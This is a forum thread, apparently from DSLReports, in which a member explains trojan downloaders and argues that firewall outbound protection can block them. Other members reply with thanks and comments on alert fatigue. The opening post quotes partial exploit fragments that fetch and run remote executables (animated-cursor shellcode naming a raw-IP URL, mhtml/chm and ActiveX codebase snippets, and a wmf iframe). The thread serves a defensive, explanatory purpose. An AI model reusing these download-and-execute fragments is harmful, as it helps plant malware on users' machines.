dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
1402
mysec
Premium Member
join:2005-11-29

3 recommendations

mysec

Premium Member

Firewall Outbound Protection: It can augment a security plan

Ask people how adware and spyware get installed, and many may not know about trojan droppers and downloaders, or understand how they work.

An acquaintance took her computer to a shop to remove Spy Sheriff. She found it hard to realize that it was a downloader, and not Windows, that caused the "you are infected" notice to display.

Most malware today is created to make money. This is achieved by surreptitiously installing spyware, adware, keyloggers, etc, and is often accomplished by means of a trojan "downloader." This file, once successfully installed, connects out to the internet to download malware of all types, and often, more downloaders to continue the cycle.

Sunbelt currently lists 405 Trojan Downloader threats.

If installed, trojans can still be blocked from carrying out their payload by a firewall with outbound protection,
• which alerts to any application attempting to connect out which has not previously been authorized to do so; or,

• which blocks an application by a specific rule.
Some examples follow.


Infection via email attachment: gift.com

When executed, gift.com copies itself to %windir% as winrpc.exe
and attempts to connect out:


_______________________________________________________


If it connects out, it downloads drsmartload.exe, the workhorse downloader
of this exploit. This trojan has been seen in a number of exploits:


_______________________________________________________


_______________________________________________________


If it connects out successfully, a few "gifts" will be received:


_______________________________________________________


Infection via email attachment: W32.Sober.Q

If the user executes the email attachment, the worm copies itself as Services.exe, and first attempts to connect out to a time server via port 37. There is a legitmate services.exe in Win2K/XP, but the firewall checks the application's MD5, sees a mis-match, and alerts:


_______________________________________________________


_______________________________________________________


Trojan piggy-backed on a program: Codec

Links on web sites to a Codec. When the codec.exe is downloaded/installed,
the file also connects out via Windows Explorer.exe to download and install malware:


_______________________________________________________


Attempt to disable Firewall: Bagle

Quote from a post on another forum:
I did a booboo by starting to open a  file called 06_05_2005.exe,
when i realized it I stopped. But it has taken my firewall away,...
The poster didn't say if he had password protection enabled,which will block
an attempt to disable the firewall service, as many Bagle variants try to do.
Note the spoofed notepad icon:


_______________________________________________________


Remote Code Execution: Animated Cursor Exploit

An animated cursor file is cached, and downloads win32.exe, which connects out to the internet:
GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec-
HTTP://195.225.177.33/vx/win32.exe

_______________________________________________________


Remote Code Execution: mhtml exploit

Using a fake .chm file, Trojan.Downloader.Small, to download the trojan load.exe

Classic case of one of the "loader" downloaders calling out for more downloaders
SCRIPT LANGUAGE="JavaScript"
obj = "<object data=\"ms-its:mhtml:file";
hxxp: / / traffweb.biz/dl/adv799/x.chm::/load.exe


_______________________________________________________


_______________________________________________________


Remote Code Execution: Browser Helper Object Exploit

IE Plugin connects to a web site, exfol.com. The site remotely downloads a Trojan, eins008.exe,
Trojan-Downloader-Exfol:
 object id="sClass" classid="CLSID:444B911E-6E55-4a11-B3E9-0D3E21AE0437"
codebase="http://www.exfol.com/v/1/i/eins008.exe" object


_______________________________________________________


Remote Code Execution: wmf exploit

The wmf file downloads ioo.exe, detected by Trend Micro as TROJ_DLOADER.BFK. The said action further exposes the affected system to malicious threats. It then saves its downloaded malware as voi{Random number}.EXE one of which is voi548.exe, Trojan.Downloader.Win32.Agent. In order to see ioo.exe, I took a screen shot of it being blocked. Otherwise, it downloads so quickly in the background that you miss it:
iframe src="wmf_exp.wmf" iframe


_______________________________________________________


_______________________________________________________


_______________________________________________________


If successful, this trojan begins the installation of Spy Sheriff:


_______________________________________________________


_______________________________________________________


_______________________________________________________


All of the above exploits have been patched, yet they continue to appear, especially in multiple-exploit malware embedded in websites, and, unfortunately, continue to infect unaware users.

Many may feel they are already well-protected from malware installing/executing.

However, if one is concerned about an unexpected, unforseen (dare I say, "zero-day") occurrence, a firewall with outbound protection - or one of the newer products with application-outbound protection - will help contain the damage locally, and also prevent smtp email engines from sending out to harvested email addresses to infect others.


______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

psicop
More human than human
Premium Member
join:2005-12-21
Australia

psicop

Premium Member

Thanks for such an informative post (and the effort).

G.

Rocky67
Pencil Neck Geek
Premium Member
join:2005-01-13
Orange, CA

Rocky67 to mysec

Premium Member

to mysec
Very informative. Thanks once again for the info and hard work.

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

Cudni to mysec

MVM

to mysec
thanks for another great info

Just to add that many free fw will only have the password protection in their pay_for products

Cudni
mysec
Premium Member
join:2005-11-29

mysec

Premium Member

psicop See Profile
Rocky67 See Profile
Cudni See Profile

I'm glad you found it informative
quote:
Just to add that many free fw will only have the password protection in their pay_for products
Thanks for that info - I wasn't aware of that. I can see limiting some things in a free version, but why would a company omit that important security feature?

Nanaki (banned)
aka novaflare. pull punches? Na
join:2002-01-24
Akron, OH

Nanaki (banned)

Member

nicly done. The problem is even with outbound protection the victom is likly to allow it all out. Sad but true most of those who get infected will get infected regardless of their security programs. They will click ok yess allow etc. What ever results in getting the prompts out of their way the fastest.

My brother is a prime example of such people he will turn off avs uninstall them remove his firewall what ever it takes to prevent alerts. Corse i suppose these sorts of people are the sort were better off with out. So let them show darwinism in action and rremove them self from the net.
mysec
Premium Member
join:2005-11-29

mysec

Premium Member

The problem of alerts is a very good point, which I will go into in another thread.

______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

salzan
Experienced Optimist
Premium Member
join:2004-01-08
WA State

salzan to mysec

Premium Member

to mysec
Thanks for the effort.

Makes me feel even better about my Kerio 2.1.5.

(with password)

sivran
Vive Vivaldi
Premium Member
join:2003-09-15
Irving, TX

sivran to Nanaki

Premium Member

to Nanaki
quote:
The problem is even with outbound protection the victom is likly to allow it all out. Sad but true most of those who get infected will get infected regardless of their security programs. They will click ok yess allow etc. What ever results in getting the prompts out of their way the fastest.
Too true. On the other hand, some people get overzealous in BLOCKING things, and end up locking themselves in. They then call their ISP, their manufacturer, their geek son/grandson, saying their internet doesn't work.

McAfee and Symantec have tried to respond to this problem by making their firewall products definition-based, like virus scanners. I think we all know how much that helped.
OZO
Premium Member
join:2003-01-17

OZO to mysec

Premium Member

to mysec
Thank you for stressing our attention on the fact how important outbound firewall is today.
psloss
Premium Member
join:2002-02-24

psloss to mysec

Premium Member

to mysec
Thought I'd resurrect this thread to point out another take on outbound protection, though it is not the only topic of Jesper Johansson's blog post:
»blogs.technet.com/jesper ··· 921.aspx